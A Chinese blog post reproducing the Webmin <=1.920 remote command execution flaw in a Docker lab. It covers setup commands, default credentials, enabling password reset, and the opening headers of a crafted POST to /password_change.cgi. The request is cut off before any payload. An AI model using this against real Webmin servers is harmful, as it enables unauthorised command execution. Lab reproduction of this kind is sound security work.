Webmin<=1.920 RCE 漏洞复现

0x00 前言

本来前一阵就想复现来着，但是官网的版本已经更新了，直到今天才发现Docker上有环境，才进行了复现

0x01影响版本

Webmin<=1.920

0x02 环境搭建

docker search webmin  docker pull piersonjarvis/webmin-samba docker run -d -p 10000:80 piersonjarvis/webmin-samba

访问你的ip:10000即可访问1.920版本的webmin

使用账号密码：root/webmin登录到后台

开启密码重置功能：

Webmin--Webmin confuration--Authentication

0x03 漏洞利用

经过长时间的寻找，未找到修改密码的接口，所以随便抓个包手动构造了一个，数据包如下：

POST /password_change.cgi HTTP/1.1 Host: 136.244.xx.xx:10000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html, *

最终执行命令成功

参考文章：

https://paper.seebug.org/1019/

更多最新复现内容，请关注公众号Timeline Sec

欢迎关注公众号Timeline Sec

来源：博客园

作者：PaperPen

链接：https://www.cnblogs.com/paperpen/p/11442532.html

标签

Docker

webmin

docker命令

samba

漏洞

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!

Webmin&lt;=1.920 RCE 漏洞复现

Webmin<=1.920 RCE 漏洞复现